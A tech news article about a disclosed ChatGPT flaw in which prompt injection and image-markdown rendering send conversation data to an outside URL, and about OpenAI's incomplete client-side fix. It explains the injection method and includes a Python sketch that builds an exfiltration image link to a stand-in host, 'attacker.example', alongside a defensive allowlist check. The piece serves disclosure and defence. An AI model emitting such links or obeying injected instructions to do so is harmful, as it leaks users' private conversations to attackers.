TechRadar
Benedict Collins

OpenAI says it has fixed a potentially serious ChatGPT flaw - but there could still be problems

Data leak.

A researcher discovered a serious flaw in ChatGPT that allowed details from a conversation to be leaked to an external URL.

When Johann Rehberger attempted to alert OpenAI to the flaw, he received no response, leaving the researcher little choice but to disclose the details publicly.

Following the disclosure, OpenAI released safety checks for ChatGPT that mitigate the flaw, though not completely.

A hasty patch

The flaw in question allows malicious chatbots powered by ChatGPT to exfiltrate sensitive data, such as the content of the chat, along with metadata and technical data.

A secondary method involves the victim submitting a prompt supplied by the attacker, which then uses image markdown rendering and prompt injection to exfiltrate the data.
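To make the mechanism concrete, here is a minimal sketch of how image-markdown rendering can leak data. The domain `attacker.example` and the `leak` parameter are invented for illustration; the point is that a naive renderer fetching an image URL will, as a side effect, deliver anything embedded in that URL to the attacker's server.

```python
import re
from urllib.parse import urlparse, parse_qs, quote

def build_exfil_markdown(secret: str) -> str:
    """An injected prompt could instruct the model to emit image markdown
    like this, embedding conversation content in the URL's query string.
    (Hypothetical domain and parameter name.)"""
    return f"![loading](https://attacker.example/log?leak={quote(secret)})"

def extract_image_urls(markdown: str) -> list[str]:
    """What a naive markdown renderer does: find image URLs and fetch them.
    The fetch itself sends the embedded data to the attacker's server."""
    return re.findall(r"!\[[^\]]*\]\(([^)]+)\)", markdown)

md = build_exfil_markdown("user said: my password is hunter2")
url = extract_image_urls(md)[0]
# Decoding the query string recovers exactly what the attacker would receive
leaked = parse_qs(urlparse(url).query)["leak"][0]
print(leaked)
```

No code needs to run on the victim's machine: the rendering step alone performs the outbound request, which is why the fix targets rendering rather than the model's output.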

Rehberger initially reported the flaw to OpenAI in April 2023, and continued supplying details of increasingly devious ways it could be exploited through November.

Rehberger stated that, "This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as "Not Applicable". Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."

Rather than continue pursuing an apparently unresponsive OpenAI, Rehberger decided to go public with his discovery, releasing a video demonstration in which his entire conversation with a chatbot designed to play tic-tac-toe was extracted to a third-party URL.

To mitigate this flaw, ChatGPT now performs checks to prevent the secondary method mentioned above from taking place. Rehberger responded to this fix stating, “When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image.”
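OpenAI's actual validation logic is not public, but the kind of client-side check described can be sketched as a domain allowlist consulted before rendering. The hostnames below are invented examples, not the real allowlist.

```python
from urllib.parse import urlparse

# Hypothetical allowlist: the real validation API's rules are not public.
ALLOWED_HOSTS = {"openai.com", "oaiusercontent.com"}

def safe_to_render(image_url: str) -> bool:
    """Before displaying an image tag returned by the model, check that its
    host is an allowed domain (or a subdomain of one). Anything else is
    refused, so no request is ever made to an attacker-controlled server."""
    host = urlparse(image_url).hostname or ""
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)

print(safe_to_render("https://files.oaiusercontent.com/pic.png"))  # True
print(safe_to_render("https://attacker.example/log?leak=data"))    # False
```

The check must run before the fetch, not after: once the image request is made, the data has already left, regardless of whether the image is ultimately displayed.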

Unfortunately, these new checks do not fully mitigate the flaw: Rehberger discovered that arbitrary domains are still sometimes rendered by ChatGPT, though success is hit and miss. And while the checks have apparently been implemented in the desktop versions of ChatGPT, the flaw remains viable in the iOS mobile app.

Via BleepingComputer
